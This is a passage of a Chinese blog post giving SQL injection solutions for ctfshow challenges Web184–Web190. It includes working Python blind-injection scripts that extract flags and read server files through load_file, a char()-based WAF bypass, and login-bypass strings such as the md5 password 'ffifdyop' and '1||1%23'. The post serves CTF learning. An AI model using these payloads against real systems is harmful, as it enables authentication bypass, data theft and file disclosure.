class="number">38</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">map</span>:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">&quot;tableName&quot;</span> : <span class="string">&quot;ctfshow_user group by pass having pass regexp (&quot;</span> + flag + j + <span class="string">&quot;)&quot;</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">print</span>(data)</span><br><span class="line">        result = requests.post(url, data=data)</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&quot;user_count = 1&quot;</span> <span class="keyword">in</span> result.text):</span><br><span class="line">            flag += j</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(flag + <span class="string">&quot;&#125;&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


        <h3 id="Web185"   >
          <a href="#Web185" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web185" class="headerlink" title="Web185"></a>Web185</h3>
      <p>用+嗯把字符凑出来</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># author:yansui</span></span><br><span class="line"><span class="comment"># payload: select count(*) from ctfshow_user group by pass having pass regexp 0x3132;</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">convert</span>(<span class="params">expression</span>):</span><br><span class="line">    content = <span class="string">&quot;concat(&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> expression:</span><br><span class="line">        content += <span class="string">&quot;char(true&quot;</span> + (<span class="built_in">ord</span>(i) - <span class="number">1</span>)* <span class="string">&quot;+true&quot;</span> + <span class="string">&quot;),&quot;</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> content[:-<span class="number">1</span>] + <span class="string">&quot;)&quot;</span></span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://3a802ffd-d44d-4460-a02d-3f9e5d581478.challenge.ctf.show/select-waf.php&#x27;</span></span><br><span class="line"><span class="built_in">map</span> = <span class="string">&#x27;0123456789abcdefghijklmnopqrstuvwxyz-&#x27;</span></span><br><span class="line">flag = <span class="string">&#x27;ctfshow&#123;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">38</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">map</span>:</span><br><span class="line">        data=&#123;</span><br><span class="line">            <span class="string">&quot;tableName&quot;</span> : <span class="string">&quot;ctfshow_user group by pass having pass regexp (&quot;</span> + convert(flag + j) + <span class="string">&quot;)&quot;</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment"># print(data)</span></span><br><span class="line">        response = requests.post(url, data=data)</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&quot;user_count = 1&quot;</span> <span class="keyword">in</span> response.text):</span><br><span class="line">            flag += j</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(flag + <span class="string">&quot;&#125;&quot;</span>)</span><br></pre></td></tr></table></div></figure>


        <h3 id="Web186"   >
          <a href="#Web186" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web186" class="headerlink" title="Web186"></a>Web186</h3>
      <p>跟上面那题一样</p>

        <h3 id="Web187"   >
          <a href="#Web187" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web187" class="headerlink" title="Web187"></a>Web187</h3>
      <p>开始登录类的题目：<br>直接md5万能密码：ffifdyop</p>
<p>抓个包就能看到flag</p>

        <h3 id="Web188"   >
          <a href="#Web188" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web188" class="headerlink" title="Web188"></a>Web188</h3>
      <p>考的PHP特性：字符串与整数弱类型比较</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$row</span>[<span class="string">&#x27;pass&#x27;</span>]==<span class="title function_ invoke__">intval</span>(<span class="variable">$password</span>))&#123;</span><br><span class="line">令 <span class="variable">$password</span> = <span class="number">0</span>, pass是字母即可</span><br></pre></td></tr></table></div></figure>
<p>用户名填1||1%23查出全部数据即可</p>

        <h3 id="Web189"   >
          <a href="#Web189" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web189" class="headerlink" title="Web189"></a>Web189</h3>
      <p>嗯读文件啊</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># author: yansui</span></span><br><span class="line"><span class="comment"># payload: if(ascii(substr(load_file(&#x27;/var/www/html/api/index.php&#x27;), 1, 1))=36, 0, 1)</span></span><br><span class="line"><span class="comment">#          if(ascii(substr(load_file(&#x27;/var/www/html/api/index.php&#x27;),&#123;i&#125;,1))=&#123;j&#125;,1,0)</span></span><br><span class="line"><span class="comment"># print(&#x27;\u67e5\u8be2\u5931\u8d25&#x27;)</span></span><br><span class="line"><span class="comment"># print(&#x27;\u5bc6\u7801\u9519\u8bef&#x27;)</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://51a8f6fe-0edf-4314-94c6-2979080058b1.challenge.ctf.show/api/index.php&#x27;</span></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">260</span>, <span class="number">1000</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>, <span class="number">128</span>):</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">&quot;username&quot;</span> : <span class="string">f&quot;if(ascii(substr(load_file(&#x27;/var/www/html/api/index.php&#x27;),<span class="subst">&#123;i&#125;</span>,1))=<span class="subst">&#123;j&#125;</span>,1,0)&quot;</span>,</span><br><span class="line">            <span class="string">&quot;password&quot;</span> : <span class="number">1</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment"># print(data)</span></span><br><span class="line">        response = requests.post(url, data=data)</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&quot;\\u67e5\\u8be2\\u5931\\u8d25&quot;</span> <span class="keyword">in</span> response.text):</span><br><span class="line">            flag += <span class="built_in">chr</span>(j)</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="Web190"   >
          <a href="#Web190" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web190" class="headerlink" title="Web190"></a>Web190</h3>
      <p>实在写不下去了，下次再写</p>
<p>为啥SQL注入又多又难啊┭┮﹏┭┮</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://yan5ui.github.io">yansui</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://yan5ui.github.io/2023/06/29/SQLi%E6%80%BB%E7%BB%93/">http://yan5ui.github.io/2023/06/29/SQLi%E6%80%BB%E7%BB%93/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2023/06/30/XSS%E6%80%BB%E7%BB%93/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">XSS基础</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2023/06/27/hello-md/"><span class="paginator-prev__text">hello!</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><section class="sidebar-toc hide"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%B8%B8%E7%94%A8%E5%A7%BF%E5%8A%BF%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">
          SQL注入常用姿势总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E6%95%B0%E5%AD%97%E5%9E%8B-amp-%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5%EF%BC%88%E6%97%A0%E8%BF%87%E6%BB%A4%EF%BC%89"><span class="toc-number">1.1.</span> <span class="toc-text">
          一、数字型&amp;字符型注入（无过滤）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81"><span class="toc-number">1.2.</span> <span class="toc-text">
          二、万能密码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E5%88%A9%E7%94%A8SQL%E6%B3%A8%E5%85%A5%E5%86%99WebShell"><span class="toc-number">1.3.</span> <span class="toc-text">
          三、利用SQL注入写WebShell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E7%9B%B2%E6%B3%A8"><span class="toc-number">1.4.</span> <span class="toc-text">
          四、盲注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94%E3%80%81bypass-waf"><span class="toc-number">1.5.</span> <span class="toc-text">
          五、bypass waf</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AD%E3%80%81%E5%AF%B9%E8%BE%93%E5%87%BA%E5%81%9A%E8%BF%87%E6%BB%A4"><span class="toc-number">1.6.</span> <span class="toc-text">
          六、对输出做过滤</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%87%E6%BB%A4flag%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">1.6.1.</span> <span class="toc-text">
          过滤flag关键字</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%87%E6%BB%A4%E6%95%B0%E5%AD%97"><span class="toc-number">1.6.2.</span> <span class="toc-text">
          过滤数字</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%87%E6%BB%A4%E6%89%80%E6%9C%89%E5%8F%AF%E8%A7%81%E5%AD%97%E7%AC%A6"><span class="toc-number">1.6.3.</span> <span class="toc-text">
          过滤所有可见字符</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%83%E3%80%81%E9%A2%98%E8%A7%A3"><span class="toc-number">1.7.</span> <span class="toc-text">
          七、题解</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Web171"><span class="toc-number">1.7.1.</span> <span class="toc-text">
          Web171</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web172"><span class="toc-number">1.7.2.</span> <span class="toc-text">
          Web172</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web173"><span class="toc-number">1.7.3.</span> <span class="toc-text">
          Web173</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web174"><span class="toc-number">1.7.4.</span> <span class="toc-text">
          Web174</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web175"><span class="toc-number">1.7.5.</span> <span class="toc-text">
          Web175</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web176"><span class="toc-number">1.7.6.</span> <span class="toc-text">
          Web176</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web177"><span class="toc-number">1.7.7.</span> <span class="toc-text">
          Web177</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web178"><span class="toc-number">1.7.8.</span> <span class="toc-text">
          Web178</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web179"><span class="toc-number">1.7.9.</span> <span class="toc-text">
          Web179</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web180"><span class="toc-number">1.7.10.</span> <span class="toc-text">
          Web180</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web181"><span class="toc-number">1.7.11.</span> <span class="toc-text">
          Web181</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web182"><span class="toc-number">1.7.12.</span> <span class="toc-text">
          Web182</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web183"><span class="toc-number">1.7.13.</span> <span class="toc-text">
          Web183</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web184"><span class="toc-number">1.7.14.</span> <span class="toc-text">
          Web184</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web185"><span class="toc-number">1.7.15.</span> <span class="toc-text">
          Web185</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web186"><span class="toc-number">1.7.16.</span> <span class="toc-text">
          Web186</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web187"><span class="toc-number">1.7.17.</span> <span class="toc-text">
          Web187</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web188"><span class="toc-number">1.7.18.</span> <span class="toc-text">
          Web188</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web189"><span class="toc-number">1.7.19.</span> <span class="toc-text">
          Web189</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web190"><span class="toc-number">1.7.20.</span> <span class="toc-text">
          Web190</span></a></li></ol></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/uploads/photo.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">yansui</p></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.8.0"></script><script src="/js/stun-boot.js?v=2.8.0"></script><script src="/js/scroll.js?v=2.8.0"></script><script src="/js/header.js?v=2.8.0"></script><script src="/js/sidebar.js?v=2.8.0"></script></body></html>